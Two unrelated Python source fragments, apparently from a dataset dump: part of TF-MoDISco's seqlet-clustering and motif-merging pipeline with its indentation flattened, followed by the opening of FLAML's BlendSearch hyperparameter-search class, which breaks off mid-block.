#affmat_transformer_r2 = affinitymat.transformers.SymmetrizeByAddition(
# probability_normalize=True)
if (self.use_louvain):
for n_runs, level_to_return in self.louvain_num_runs_and_levels_r2:
affmat_transformer_r2 = affmat_transformer_r2.chain(
affinitymat.transformers.LouvainMembershipAverage(
n_runs=n_runs,
level_to_return=level_to_return,
parallel_threads=self.n_cores, seed=self.seed))
clusterer_r2 = cluster.core.LouvainCluster(
level_to_return=self.final_louvain_level_to_return,
affmat_transformer=affmat_transformer_r2,
contin_runs=self.contin_runs_r2,
verbose=self.verbose, seed=self.seed,
initclusters_weight=self.louvain_initclusters_weight)
else:
clusterer_r2 = cluster.core.LeidenClusterParallel(
n_jobs=self.n_cores,
affmat_transformer=affmat_transformer_r2,
numseedstotry=self.contin_runs_r2,
n_leiden_iterations=self.n_leiden_iterations_r2,
verbose=self.verbose)
clusterer_per_round = [clusterer_r1, clusterer_r2]
#prepare the seqlet aggregator
expand_trim_expand1 =\
aggregator.ExpandSeqletsToFillPattern(
track_set=track_set,
flank_to_add=self.initial_flank_to_add).chain(
aggregator.TrimToBestWindowByIC(
window_size=self.trim_to_window_size,
onehot_track_name=onehot_track_name,
bg_freq=bg_freq)).chain(
aggregator.ExpandSeqletsToFillPattern(
track_set=track_set,
flank_to_add=self.initial_flank_to_add))
postprocessor1 =\
aggregator.TrimToFracSupport(
min_frac=self.frac_support_to_trim_to,
min_num=self.min_num_to_trim_to,
verbose=self.verbose)\
.chain(expand_trim_expand1)
seqlet_aggregator = aggregator.GreedySeqletAggregator(
pattern_aligner=core.CrossContinJaccardPatternAligner(
pattern_comparison_settings=pattern_comparison_settings),
seqlet_sort_metric=
lambda x: -sum([np.sum(np.abs(x[track_name].fwd)) for
track_name in contrib_scores_track_names]),
track_set=track_set, #needed for seqlet expansion
postprocessor=postprocessor1)
def sign_consistency_func(motif):
motif_track_signs = [
np.sign(np.sum(motif[contrib_scores_track_name].fwd)) for
contrib_scores_track_name in contrib_scores_track_names]
return all([(x==y) for x,y in zip(motif_track_signs, track_signs)])
#prepare the similar patterns collapser
pattern_to_seqlet_sim_computer =\
affinitymat.core.AffmatFromSeqletsWithNNpairs(
pattern_comparison_settings=pattern_comparison_settings,
sim_metric_on_nn_pairs=\
affinitymat.core.ParallelCpuCrossMetricOnNNpairs(
n_cores=self.n_cores,
cross_metric_single_region=\
affinitymat.core.CrossContinJaccardSingleRegion(),
verbose=False))
#similarity settings for merging
prob_and_sim_merge_thresholds =\
self.prob_and_pertrack_sim_merge_thresholds
prob_and_sim_dealbreaker_thresholds =\
self.prob_and_pertrack_sim_dealbreaker_thresholds
similar_patterns_collapser =\
aggregator.DynamicDistanceSimilarPatternsCollapser2(
pattern_comparison_settings=pattern_comparison_settings,
track_set=track_set,
pattern_aligner=core.CrossCorrelationPatternAligner(
pattern_comparison_settings=
affinitymat.core.PatternComparisonSettings(
track_names=(
contrib_scores_track_names+
other_comparison_track_names),
track_transformer=
affinitymat.MeanNormalizer().chain(
affinitymat.MagnitudeNormalizer()),
min_overlap=self.min_overlap_while_sliding)),
collapse_condition=(lambda prob, aligner_sim:
any([(prob >= x[0] and aligner_sim >= x[1])
for x in prob_and_sim_merge_thresholds])),
dealbreaker_condition=(lambda prob, aligner_sim:
any([(prob <= x[0] and aligner_sim <= x[1])
for x in prob_and_sim_dealbreaker_thresholds])),
postprocessor=postprocessor1,
verbose=self.verbose,
max_seqlets_subsample=self.merging_max_seqlets_subsample,
n_cores=self.n_cores)
subcluster_settings = {
"pattern_comparison_settings": pattern_comparison_settings,
"perplexity": self.subcluster_perplexity,
"n_jobs": self.n_cores,
}
spurious_merge_detector = aggregator.DetectSpuriousMerging2(
subcluster_settings=subcluster_settings,
verbose=self.verbose,
min_in_subcluster=max(self.final_min_cluster_size,
self.subcluster_perplexity),
similar_patterns_collapser=similar_patterns_collapser)
#spurious_merge_detector = aggregator.DetectSpuriousMerging(
# track_names=contrib_scores_track_names,
# track_transformer=affinitymat.core.L1Normalizer(),
# affmat_from_1d=affinitymat.core.ContinJaccardSimilarity(
# make_positive=True, verbose=False),
# diclusterer=cluster.core.LouvainCluster(
# level_to_return=1,
# max_clusters=2, contin_runs=20,
# verbose=False, seed=self.seed),
# is_dissimilar_func=aggregator.PearsonCorrIsDissimilarFunc(
# threshold=self.threshold_for_spurious_merge_detection,
# verbose=self.verbose),
# min_in_subcluster=self.final_min_cluster_size)
#similar_patterns_collapser =\
# aggregator.DynamicDistanceSimilarPatternsCollapser(
# pattern_to_pattern_sim_computer=
# pattern_to_seqlet_sim_computer,
# aff_to_dist_mat=aff_to_dist_mat,
# pattern_aligner=core.CrossCorrelationPatternAligner(
# pattern_comparison_settings=
# affinitymat.core.PatternComparisonSettings(
# track_names=(
# contrib_scores_track_names+
# other_comparison_track_names),
# track_transformer=
# affinitymat.MeanNormalizer().chain(
# affinitymat.MagnitudeNormalizer()),
# min_overlap=self.min_overlap_while_sliding)),
# collapse_condition=(lambda prob, aligner_sim:
# any([(prob > x[0] and aligner_sim > x[1])
# for x in prob_and_sim_merge_thresholds])),
# dealbreaker_condition=(lambda prob, aligner_sim:
# any([(prob < x[0] and aligner_sim < x[1])
# for x in prob_and_sim_dealbreaker_thresholds])),
# postprocessor=postprocessor1,
# verbose=self.verbose)
pattern_filterer = pattern_filterer_module.MinSeqletSupportFilterer(
min_seqlet_support=self.final_min_cluster_size).chain(
pattern_filterer_module.MinICinWindow(
window_size=self.min_ic_windowsize,
min_ic_in_window=self.min_ic_in_window,
background=bg_freq,
sequence_track_name=onehot_track_name,
ppm_pseudocount=self.ppm_pseudocount
)
)
#seqlet_reassigner =\
# aggregator.ReassignSeqletsFromSmallClusters(
# seqlet_assigner=aggregator.AssignSeqletsByBestMetric(
# pattern_comparison_settings=pattern_comparison_settings,
# individual_aligner_metric=
# core.get_best_alignment_crosscontinjaccard,
# matrix_affinity_metric=
# affinitymat.core.CrossContinJaccardMultiCoreCPU(
# verbose=self.verbose, n_cores=self.n_cores),
# min_similarity=self.min_similarity_for_seqlet_assignment,
# track_set=track_set),
# min_cluster_size=self.final_min_cluster_size,
# postprocessor=expand_trim_expand1,
# verbose=self.verbose)
final_postprocessor = aggregator.ExpandSeqletsToFillPattern(
track_set=track_set,
flank_to_add=self.final_flank_to_add)
return TfModiscoSeqletsToPatterns(
seqlets_sorter=seqlets_sorter,
initclusterer_factory=initclusterer_factory,
coarse_affmat_computer=coarse_affmat_computer,
nearest_neighbors_to_compute=self.nearest_neighbors_to_compute,
affmat_from_seqlets_with_nn_pairs=
affmat_from_seqlets_with_nn_pairs,
filter_mask_from_correlation=filter_mask_from_correlation,
filter_beyond_first_round=self.filter_beyond_first_round,
skip_fine_grained=self.skip_fine_grained,
aff_to_dist_mat=aff_to_dist_mat,
tsne_perplexity=self.tsne_perplexity,
#density_adapted_affmat_transformer=
# density_adapted_affmat_transformer,
clusterer_per_round=clusterer_per_round,
seqlet_aggregator=seqlet_aggregator,
sign_consistency_func=sign_consistency_func,
subcluster_settings=subcluster_settings,
spurious_merge_detector=spurious_merge_detector,
similar_patterns_collapser=similar_patterns_collapser,
#seqlet_reassigner=seqlet_reassigner,
pattern_filterer=pattern_filterer,
final_postprocessor=final_postprocessor,
verbose=self.verbose,
n_cores=self.n_cores,
other_config={
'onehot_track_name': onehot_track_name,
'contrib_scores_track_names': contrib_scores_track_names,
'hypothetical_contribs_track_names':
hypothetical_contribs_track_names,
'track_signs': track_signs,
'other_comparison_track_names': other_comparison_track_names},
)
def save_hdf5(self, grp):
grp.attrs['jsonable_config'] =\
json.dumps(self.jsonable_config, indent=4, separators=(',', ': '))
class SeqletsToPatternsResults(object):
def __init__(self,
each_round_initcluster_motifs,
patterns,
remaining_patterns,
pattern_merge_hierarchy,
cluster_results,
total_time_taken,
other_config={},
success=True,
**kwargs):
self.each_round_initcluster_motifs = each_round_initcluster_motifs
self.other_config = other_config
self.success = success
self.patterns = patterns
self.remaining_patterns = remaining_patterns
self.pattern_merge_hierarchy = pattern_merge_hierarchy
self.cluster_results = cluster_results
self.total_time_taken = total_time_taken
self.__dict__.update(**kwargs)
def save_each_round_initcluster_motifs(self, grp):
all_round_names = []
for (round_idx,initcluster_motifs)\
in enumerate(self.each_round_initcluster_motifs):
            round_name = "round_"+str(round_idx)
            all_round_names.append(round_name)
            util.save_patterns(patterns=initcluster_motifs,
                               grp=grp.create_group(round_name))
util.save_string_list(
string_list=all_round_names,
dset_name="all_round_names",
grp=grp)
@classmethod
def load_each_round_initcluster_motifs(cls, grp, track_set):
all_round_names = util.load_string_list(dset_name="all_round_names",
grp=grp)
each_round_initcluster_motifs = []
for round_name in all_round_names:
round_grp = grp[round_name]
            initcluster_motifs = util.load_patterns(grp=round_grp,
                                                    track_set=track_set)
each_round_initcluster_motifs.append(initcluster_motifs)
return each_round_initcluster_motifs
@classmethod
def from_hdf5(cls, grp, track_set):
success = grp.attrs.get("success", False)
if (success):
if ("each_round_initcluster_motifs" not in grp):
each_round_initcluster_motifs = None
else:
each_round_initcluster_motifs =\
cls.load_each_round_initcluster_motifs(
grp=grp["each_round_initcluster_motifs"],
track_set=track_set)
patterns = util.load_patterns(grp=grp["patterns"],
track_set=track_set)
if "remaining_patterns" in grp:
remaining_patterns = util.load_patterns(
grp=grp["remaining_patterns"],
track_set=track_set)
else: #backwards compatibility
remaining_patterns = []
cluster_results = None
total_time_taken = grp.attrs["total_time_taken"]
if ("pattern_merge_hierarchy" in grp):
pattern_merge_hierarchy =\
aggregator.PatternMergeHierarchy.from_hdf5(
grp=grp["pattern_merge_hierarchy"],
track_set=track_set)
else:
pattern_merge_hierarchy = None
return cls(
each_round_initcluster_motifs=each_round_initcluster_motifs,
patterns=patterns,
remaining_patterns=remaining_patterns,
pattern_merge_hierarchy=pattern_merge_hierarchy,
cluster_results=cluster_results,
total_time_taken=total_time_taken)
else:
return cls(success=False, patterns=None, cluster_results=None,
total_time_taken=None,
each_round_initcluster_motifs=None,
remaining_patterns=None,
pattern_merge_hierarchy=None)
def save_hdf5(self, grp):
grp.attrs["success"] = self.success
grp.attrs["other_config"] =\
json.dumps(self.other_config, indent=4, separators=(',', ': '))
if (self.success):
grp.attrs["total_time_taken"] = self.total_time_taken
if (self.each_round_initcluster_motifs is not None):
self.save_each_round_initcluster_motifs(
grp=grp.create_group("each_round_initcluster_motifs"))
util.save_patterns(self.patterns,
grp.create_group("patterns"))
util.save_patterns(
self.remaining_patterns,
grp.create_group("remaining_patterns"))
self.cluster_results.save_hdf5(grp.create_group("cluster_results"))
grp.attrs['total_time_taken'] = self.total_time_taken
self.pattern_merge_hierarchy.save_hdf5(
grp=grp.create_group("pattern_merge_hierarchy"))
class AbstractSeqletsToPatterns(object):
def __call__(self, seqlets):
raise NotImplementedError()
class TfModiscoSeqletsToPatterns(AbstractSeqletsToPatterns):
def __init__(self, seqlets_sorter,
initclusterer_factory,
coarse_affmat_computer,
nearest_neighbors_to_compute,
affmat_from_seqlets_with_nn_pairs,
filter_mask_from_correlation,
filter_beyond_first_round,
skip_fine_grained,
aff_to_dist_mat,
tsne_perplexity,
#density_adapted_affmat_transformer,
clusterer_per_round,
seqlet_aggregator,
sign_consistency_func,
spurious_merge_detector,
similar_patterns_collapser,
pattern_filterer,
#seqlet_reassigner,
final_postprocessor,
subcluster_settings,
n_cores,
other_config={},
verbose=True):
self.seqlets_sorter = seqlets_sorter
self.initclusterer_factory = initclusterer_factory
self.coarse_affmat_computer = coarse_affmat_computer
self.nearest_neighbors_to_compute = nearest_neighbors_to_compute
self.affmat_from_seqlets_with_nn_pairs =\
affmat_from_seqlets_with_nn_pairs
self.filter_mask_from_correlation = filter_mask_from_correlation
self.filter_beyond_first_round = filter_beyond_first_round
self.skip_fine_grained = skip_fine_grained
self.aff_to_dist_mat = aff_to_dist_mat
self.tsne_perplexity = tsne_perplexity
#self.density_adapted_affmat_transformer =\
# density_adapted_affmat_transformer
self.clusterer_per_round = clusterer_per_round
self.seqlet_aggregator = seqlet_aggregator
self.sign_consistency_func = sign_consistency_func
self.spurious_merge_detector = spurious_merge_detector
self.similar_patterns_collapser = similar_patterns_collapser
#self.seqlet_reassigner = seqlet_reassigner
self.pattern_filterer = pattern_filterer
self.final_postprocessor = final_postprocessor
self.verbose = verbose
self.subcluster_settings = subcluster_settings
self.n_cores = n_cores
self.other_config = other_config
def get_cluster_to_aggregate_motif(self, seqlets, cluster_indices,
sign_consistency_check,
min_seqlets_in_motif):
num_clusters = max(cluster_indices+1)
cluster_to_seqlets = defaultdict(list)
assert len(seqlets)==len(cluster_indices)
for seqlet,idx in zip(seqlets, cluster_indices):
cluster_to_seqlets[idx].append(seqlet)
cluster_to_motif = OrderedDict()
cluster_to_eliminated_motif = OrderedDict()
for i in range(num_clusters):
if (len(cluster_to_seqlets[i]) >= min_seqlets_in_motif):
if (self.verbose):
print("Aggregating for cluster "+str(i)+" with "
+str(len(cluster_to_seqlets[i]))+" seqlets")
print_memory_use()
sys.stdout.flush()
motifs = self.seqlet_aggregator(cluster_to_seqlets[i])
assert len(motifs)<=1
if (len(motifs) > 0):
motif = motifs[0]
if (sign_consistency_check==False or
self.sign_consistency_func(motif)):
cluster_to_motif[i] = motif
else:
if (self.verbose):
print("Dropping cluster "+str(i)+
" with "+str(motif.num_seqlets)
+" seqlets due to sign disagreement")
cluster_to_eliminated_motif[i] = motif
return cluster_to_motif, cluster_to_eliminated_motif
def do_density_adaptation(self, new_rows_distmat_nn, new_rows_nn,
new_rows_betas, new_rows_normfactors):
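        # For each retained pair (i, j), the density-adapted affinity is the
        # geometric mean of the two conditional probabilities
        # exp(-d_ij/beta_i)/Z_i and exp(-d_ij/beta_j)/Z_j, i.e. a t-SNE-style
        # symmetrization using the per-row bandwidths (betas) and
        # normalization factors obtained from the perplexity calibration.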
new_rows_densadapted_affmat_nn = []
for i in range(len(new_rows_distmat_nn)):
densadapted_row = []
for j,distance in zip(new_rows_nn[i], new_rows_distmat_nn[i]):
densadapted_row.append(np.sqrt(
(np.exp(-distance/new_rows_betas[i])/new_rows_normfactors[i])
*(np.exp(-distance/new_rows_betas[j])/
new_rows_normfactors[j])))
new_rows_densadapted_affmat_nn.append(densadapted_row)
return new_rows_densadapted_affmat_nn
def __call__(self, seqlets):
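        # High-level flow of each round: sort the seqlets, compute a coarse
        # affinity matrix with nearest neighbors, refine the affinities on the
        # nearest-neighbor pairs, filter rows by the correlation between
        # coarse and fine affinities (first round, or always if configured),
        # convert affinities to distances, density-adapt them with
        # perplexity-calibrated betas, cluster, and aggregate each cluster
        # into a candidate motif. After the rounds, motifs are split
        # (spurious-merge detection), merged, filtered and post-processed.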
seqlets = self.seqlets_sorter(seqlets)
if (self.initclusterer_factory is not None):
initclusterer = self.initclusterer_factory(seqlets=seqlets)
else:
initclusterer = None
start = time.time()
#seqlets_sets = []
#coarse_affmats = []
#nn_affmats = []
#filtered_seqlets_sets = []
#filtered_affmats = []
#density_adapted_affmats = []
#cluster_results_sets = []
#cluster_to_motif_sets = []
#cluster_to_eliminated_motif_sets = []
if (initclusterer is not None):
each_round_initcluster_motifs = []
else:
each_round_initcluster_motifs = None
for round_idx, clusterer in enumerate(self.clusterer_per_round):
import gc
gc.collect()
round_num = round_idx+1
if (initclusterer is not None):
initclusters = initclusterer(seqlets=seqlets)
initcluster_motifs =\
list(self.get_cluster_to_aggregate_motif(
seqlets=seqlets,
cluster_indices=initclusters,
sign_consistency_check=False,
min_seqlets_in_motif=2)[0].values())
each_round_initcluster_motifs.append(initcluster_motifs)
else:
initclusters = None
initcluster_motifs = None
if (len(seqlets)==0):
if (self.verbose):
print("len(seqlets) is 0 - bailing!")
return SeqletsToPatternsResults(
each_round_initcluster_motifs=None,
patterns=None,
remaining_patterns=None,
pattern_merge_hierarchy=None,
cluster_results=None,
total_time_taken=None,
success=False,
seqlets=None,
affmat=None)
if (self.verbose):
print("(Round "+str(round_num)+
") num seqlets: "+str(len(seqlets)))
print("(Round "+str(round_num)+") Computing coarse affmat")
print_memory_use()
sys.stdout.flush()
#coarse_affmat = self.coarse_affmat_computer(seqlets)
#coarse_affmats.append(coarse_affmat)
coarse_affmat_nn, seqlet_neighbors =\
self.coarse_affmat_computer(seqlets, initclusters=initclusters)
gc.collect()
if (self.verbose):
print("(Round "+str(round_num)+") Computed coarse affmat")
print_memory_use()
sys.stdout.flush()
if (self.skip_fine_grained==False):
#nn_start = time.time()
#if (self.verbose):
# print("(Round "+str(round_num)+") Compute nearest neighbors"
# +" from coarse affmat")
# print_memory_use()
# sys.stdout.flush()
#seqlet_neighbors = get_seqlet_neighbors_with_initcluster(
# nearest_neighbors_to_compute=
# self.nearest_neighbors_to_compute,
# coarse_affmat=coarse_affmat,
# initclusters=initclusters)
#if (self.verbose):
# print("Computed nearest neighbors in",
# round(time.time()-nn_start,2),"s")
# print_memory_use()
# sys.stdout.flush()
nn_affmat_start = time.time()
if (self.verbose):
print("(Round "+str(round_num)+") Computing affinity matrix"
+" on nearest neighbors")
print_memory_use()
sys.stdout.flush()
#nn_affmat = self.affmat_from_seqlets_with_nn_pairs(
# seqlet_neighbors=seqlet_neighbors,
# seqlets=seqlets)
#nn_affmats.append(nn_affmat)
fine_affmat_nn = self.affmat_from_seqlets_with_nn_pairs(
seqlet_neighbors=seqlet_neighbors,
seqlets=seqlets,
return_sparse=True)
#get the fine_affmat_nn reorderings
reorderings = np.array([np.argsort(-finesimsinrow)
for finesimsinrow in fine_affmat_nn])
#reorder fine_affmat_nn, coarse_affmat_nn and seqlet_neighbors
# according to reorderings
fine_affmat_nn = [finesimsinrow[rowreordering]
for (finesimsinrow, rowreordering)
in zip(fine_affmat_nn, reorderings)]
coarse_affmat_nn = [coarsesimsinrow[rowreordering]
for (coarsesimsinrow, rowreordering)
in zip(coarse_affmat_nn, reorderings)]
seqlet_neighbors = [nnrow[rowreordering]
for (nnrow, rowreordering)
in zip(seqlet_neighbors, reorderings)]
del reorderings
gc.collect()
if (self.verbose):
print("(Round "+str(round_num)+") Computed affinity matrix"
+" on nearest neighbors in",
round(time.time()-nn_affmat_start,2),"s")
print_memory_use()
sys.stdout.flush()
#filter by correlation
if (round_idx == 0 or self.filter_beyond_first_round==True):
#the filter_mask_from_correlation function only operates
# on columns in which np.abs(main_affmat) > 0
#filtered_rows_mask = self.filter_mask_from_correlation(
# main_affmat=nn_affmat,
# other_affmat=coarse_affmat)
filtered_rows_mask = self.filter_mask_from_correlation(
main_affmat=fine_affmat_nn,
other_affmat=coarse_affmat_nn)
if (self.verbose):
print("(Round "+str(round_num)+") Retained "
+str(np.sum(filtered_rows_mask))
+" rows out of "+str(len(filtered_rows_mask))
+" after filtering")
print_memory_use()
sys.stdout.flush()
else:
filtered_rows_mask = np.array([True for x in seqlets])
if (self.verbose):
print("Not applying filtering for "
+"rounds above first round")
print_memory_use()
sys.stdout.flush()
del coarse_affmat_nn
gc.collect()
filtered_seqlets = [x[0] for x in
zip(seqlets, filtered_rows_mask) if (x[1])]
if (initclusters is not None):
filtered_initclusters = initclusters[filtered_rows_mask]
else:
filtered_initclusters = None
#filtered_seqlets_sets.append(filtered_seqlets)
#filtered_affmat =\
# nn_affmat[filtered_rows_mask][:,filtered_rows_mask]
#del coarse_affmat
#del nn_affmat
#figure out a mapping from pre-filtering to the
# post-filtering indices
new_idx_mapping = (
np.cumsum(1.0*(filtered_rows_mask)).astype("int")-1)
retained_indices = set(np.arange(len(filtered_rows_mask))[
filtered_rows_mask])
del filtered_rows_mask
filtered_neighbors = []
filtered_affmat_nn = []
for old_row_idx, (old_neighbors,affmat_row) in enumerate(
zip(seqlet_neighbors, fine_affmat_nn)):
if old_row_idx in retained_indices:
filtered_old_neighbors = [
neighbor for neighbor in old_neighbors if neighbor
in retained_indices]
filtered_affmat_row = [
affmatval for affmatval,neighbor
in zip(affmat_row,old_neighbors)
if neighbor in retained_indices]
filtered_neighbors_row = [
new_idx_mapping[neighbor] for neighbor
in filtered_old_neighbors]
filtered_neighbors.append(filtered_neighbors_row)
filtered_affmat_nn.append(filtered_affmat_row)
                #overwrite seqlet_neighbors...should be ok even if the rows are
                # not all the same length
seqlet_neighbors = filtered_neighbors
del (filtered_neighbors, retained_indices, new_idx_mapping)
else:
                filtered_affmat_nn = coarse_affmat_nn
filtered_seqlets = seqlets
if (initclusters is not None):
filtered_initclusters = initclusters
else:
filtered_initclusters = None
if (self.verbose):
print("(Round "+str(round_num)+") Computing density "
+"adapted affmat")
print_memory_use()
sys.stdout.flush()
#density_adapted_affmat =\
# self.density_adapted_affmat_transformer(filtered_affmat)
#del filtered_affmat
#density_adapted_affmats.append(density_adapted_affmat)
#apply aff_to_dist_mat one row at a time
distmat_nn = [self.aff_to_dist_mat(affinity_mat=x)
for x in filtered_affmat_nn]
del filtered_affmat_nn
if (self.verbose):
print("Symmetrizing nearest neighbors")
#Note: the fine-grained similarity metric isn't actually symmetric
# because a different input will get padded with zeros depending
# on which seqlets are specified as the filters and which seqlets
# are specified as the 'thing to scan'. So explicit symmetrization
# is worthwhile
sym_seqlet_neighbors, sym_distmat_nn = util.symmetrize_nn_distmat(
distmat_nn=distmat_nn, nn=seqlet_neighbors,
average_with_transpose=True)
del distmat_nn
del seqlet_neighbors
if (self.verbose):
print("Computing betas for density adaptation")
#Compute beta values for the density adaptation. *store it*
betas_and_ps = Parallel(n_jobs=self.n_cores)(
delayed(util.binary_search_perplexity)(
self.tsne_perplexity, distances)
for distances in sym_distmat_nn)
betas = np.array([x[0] for x in betas_and_ps])
if (self.verbose):
print("Computing normalizing denominators")
#also compute the normalization factor needed to get probs to sum to 1
#note: sticking to lists here because different rows of
# sym_distmat_nn may have different lengths after adding in
# the symmetric pairs
densadapted_affmat_nn_unnorm = [np.exp(-np.array(distmat_row)/beta)
for distmat_row, beta in zip(sym_distmat_nn, betas)]
normfactors = np.array([max(np.sum(x),1e-8) for x in
densadapted_affmat_nn_unnorm])
sym_densadapted_affmat_nn = self.do_density_adaptation(
new_rows_distmat_nn=sym_distmat_nn,
new_rows_nn=sym_seqlet_neighbors,
new_rows_betas=betas,
new_rows_normfactors=normfactors)
util.verify_symmetric_nn_affmat(
affmat_nn=sym_densadapted_affmat_nn,
nn=sym_seqlet_neighbors)
#Make csr matrix
csr_density_adapted_affmat =\
util.coo_matrix_from_neighborsformat(
entries=sym_densadapted_affmat_nn,
neighbors=sym_seqlet_neighbors,
ncols=len(sym_densadapted_affmat_nn)).tocsr()
if (self.verbose):
print("(Round "+str(round_num)+") Computing clustering")
print_memory_use()
sys.stdout.flush()
#cluster_results = clusterer(density_adapted_affmat,
# initclusters=filtered_initclusters)
#del density_adapted_affmat
#cluster_results_sets.append(cluster_results)
cluster_results = clusterer(csr_density_adapted_affmat,
initclusters=filtered_initclusters)
del csr_density_adapted_affmat
num_clusters = max(cluster_results.cluster_indices+1)
cluster_idx_counts = Counter(cluster_results.cluster_indices)
if (self.verbose):
print("Got "+str(num_clusters)
+" clusters after round "+str(round_num))
print("Counts:")
print(dict([x for x in cluster_idx_counts.items()]))
print_memory_use()
sys.stdout.flush()
if (self.verbose):
print("(Round "+str(round_num)+") Aggregating seqlets"
+" in each cluster")
print_memory_use()
sys.stdout.flush()
cluster_to_motif, cluster_to_eliminated_motif =\
self.get_cluster_to_aggregate_motif(
seqlets=filtered_seqlets,
cluster_indices=cluster_results.cluster_indices,
sign_consistency_check=True,
min_seqlets_in_motif=0)
#obtain unique seqlets from adjusted motifs
seqlets = list(dict([(y.exidx_start_end_string, y)
for x in cluster_to_motif.values()
for y in x.seqlets]).values())
if (self.verbose):
print("Got "+str(len(cluster_to_motif.values()))+" clusters")
print("Splitting into subclusters...")
print_memory_use()
sys.stdout.flush()
split_patterns = self.spurious_merge_detector(
cluster_to_motif.values())
if (len(split_patterns)==0):
if (self.verbose):
print("No more surviving patterns - bailing!")
return SeqletsToPatternsResults(
each_round_initcluster_motifs=None,
patterns=None,
remaining_patterns=None,
pattern_merge_hierarchy=None,
cluster_results=None,
total_time_taken=None,
success=False,
seqlets=None,
affmat=None)
#Now start merging patterns
if (self.verbose):
print("Merging on "+str(len(split_patterns))+" clusters")
print_memory_use()
sys.stdout.flush()
merged_patterns, pattern_merge_hierarchy =\
self.similar_patterns_collapser(
patterns=split_patterns)
merged_patterns = sorted(merged_patterns, key=lambda x: -x.num_seqlets)
if (self.verbose):
print("Got "+str(len(merged_patterns))+" patterns after merging")
print_memory_use()
sys.stdout.flush()
if (self.verbose):
print("Performing filtering")
print_memory_use()
sys.stdout.flush()
final_patterns, remaining_patterns = self.pattern_filterer(
merged_patterns)
#reassigned_patterns = self.seqlet_reassigner(merged_patterns)
final_patterns = self.final_postprocessor(final_patterns)
remaining_patterns =\
self.final_postprocessor(remaining_patterns)
if (self.verbose):
print("Got "+str(len(final_patterns))
+" patterns after filtering")
print_memory_use()
sys.stdout.flush()
total_time_taken = round(time.time()-start,2)
if (self.verbose):
print("Total time taken is "
+str(total_time_taken)+"s")
print_memory_use()
sys.stdout.flush()
#apply subclustering procedure on the final patterns
print("Applying subclustering to the final motifs")
for patternidx, pattern in enumerate(final_patterns):
print("On pattern",patternidx)
pattern.compute_subclusters_and_embedding(
verbose=self.verbose,
**self.subcluster_settings)
results = SeqletsToPatternsResults(
each_round_initcluster_motifs=each_round_initcluster_motifs,
patterns=final_patterns,
remaining_patterns=remaining_patterns,
seqlets=filtered_seqlets, #last stage of filtered seqlets
#affmat=filtered_affmat,
cluster_results=cluster_results,
total_time_taken=total_time_taken,
#seqlets_sets=seqlets_sets,
#coarse_affmats=coarse_affmats,
#nn_affmats=nn_affmats,
#filtered_seqlets_sets=filtered_seqlets_sets,
#filtered_affmats=filtered_affmats,
#density_adapted_affmats=density_adapted_affmats,
#cluster_results_sets=cluster_results_sets,
#cluster_to_motif_sets=cluster_to_motif_sets,
#cluster_to_eliminated_motif_sets=cluster_to_eliminated_motif_sets,
merged_patterns=merged_patterns,
pattern_merge_hierarchy=pattern_merge_hierarchy,
#reassigned_patterns=reassigned_patterns
)
return results
|
the-stack_106_22104
|
'''!
* Copyright (c) 2020-2021 Microsoft Corporation. All rights reserved.
* Licensed under the MIT License. See LICENSE file in the
* project root for license information.
'''
from typing import Dict, Optional, List, Tuple, Callable
import numpy as np
import time
import pickle
try:
from ray.tune.suggest import Searcher
from ray.tune.suggest.optuna import OptunaSearch as GlobalSearch
from ray.tune.suggest.variant_generator import generate_variants
except ImportError:
from .suggestion import Searcher
from .suggestion import OptunaSearch as GlobalSearch
from .variant_generator import generate_variants
from .search_thread import SearchThread
from .flow2 import FLOW2 as LocalSearch
import logging
logger = logging.getLogger(__name__)
class BlendSearch(Searcher):
'''class for BlendSearch algorithm
'''
cost_attr = "time_total_s" # cost attribute in result
lagrange = '_lagrange' # suffix for lagrange-modified metric
penalty = 1e+10 # penalty term for constraints
def __init__(self,
metric: Optional[str] = None,
mode: Optional[str] = None,
space: Optional[dict] = None,
points_to_evaluate: Optional[List[dict]] = None,
low_cost_partial_config: Optional[dict] = None,
cat_hp_cost: Optional[dict] = None,
prune_attr: Optional[str] = None,
min_resource: Optional[float] = None,
max_resource: Optional[float] = None,
reduction_factor: Optional[float] = None,
global_search_alg: Optional[Searcher] = None,
config_constraints: Optional[
List[Tuple[Callable[[dict], float], str, float]]] = None,
metric_constraints: Optional[
List[Tuple[str, str, float]]] = None,
seed: Optional[int] = 20):
'''Constructor
Args:
metric: A string of the metric name to optimize for.
mode: A string in ['min', 'max'] to specify the objective as
minimization or maximization.
space: A dictionary to specify the search space.
points_to_evaluate: Initial parameter suggestions to be run first.
low_cost_partial_config: A dictionary from a subset of
controlled dimensions to the initial low-cost values.
e.g.,
.. code-block:: python
{'n_estimators': 4, 'max_leaves': 4}
cat_hp_cost: A dictionary from a subset of categorical dimensions
to the relative cost of each choice.
e.g.,
.. code-block:: python
{'tree_method': [1, 1, 2]}
i.e., the relative cost of the
three choices of 'tree_method' is 1, 1 and 2 respectively.
prune_attr: A string of the attribute used for pruning.
Not necessarily in space.
When prune_attr is in space, it is a hyperparameter, e.g.,
'n_iters', and the best value is unknown.
When prune_attr is not in space, it is a resource dimension,
e.g., 'sample_size', and the peak performance is assumed
to be at the max_resource.
min_resource: A float of the minimal resource to use for the
prune_attr; only valid if prune_attr is not in space.
max_resource: A float of the maximal resource to use for the
prune_attr; only valid if prune_attr is not in space.
reduction_factor: A float of the reduction factor used for
incremental pruning.
global_search_alg: A Searcher instance as the global search
instance. If omitted, Optuna is used. The following algos have
known issues when used as global_search_alg:
- HyperOptSearch raises exception sometimes
- TuneBOHB has its own scheduler
config_constraints: A list of config constraints to be satisfied.
e.g.,
                .. code-block:: python
config_constraints = [(mem_size, '<=', 1024**3)]
mem_size is a function which produces a float number for the bytes
needed for a config.
It is used to skip configs which do not fit in memory.
metric_constraints: A list of metric constraints to be satisfied.
                e.g., `[('precision', '>=', 0.9)]`
seed: An integer of the random seed.
'''
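        # Illustrative usage (a sketch, not from the original source; assumes a
        # tune-style search space using the sampling functions imported further
        # down in this module, and a 'loss' metric reported by the trial):
        #   algo = BlendSearch(metric='loss', mode='min',
        #                      space={'lr': loguniform(1e-4, 1e-1)},
        #                      low_cost_partial_config={'n_estimators': 4})
        #   config = algo.suggest('trial_0')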
self._metric, self._mode = metric, mode
init_config = low_cost_partial_config or {}
if not init_config:
logger.warning(
"No low-cost partial config given to the search algorithm. "
"For cost-frugal search, "
"consider providing low-cost values for cost-related hps via "
"'low_cost_partial_config'."
)
self._points_to_evaluate = points_to_evaluate or []
self._config_constraints = config_constraints
self._metric_constraints = metric_constraints
if self._metric_constraints:
# metric modified by lagrange
metric += self.lagrange
if global_search_alg is not None:
self._gs = global_search_alg
elif getattr(self, '__name__', None) != 'CFO':
try:
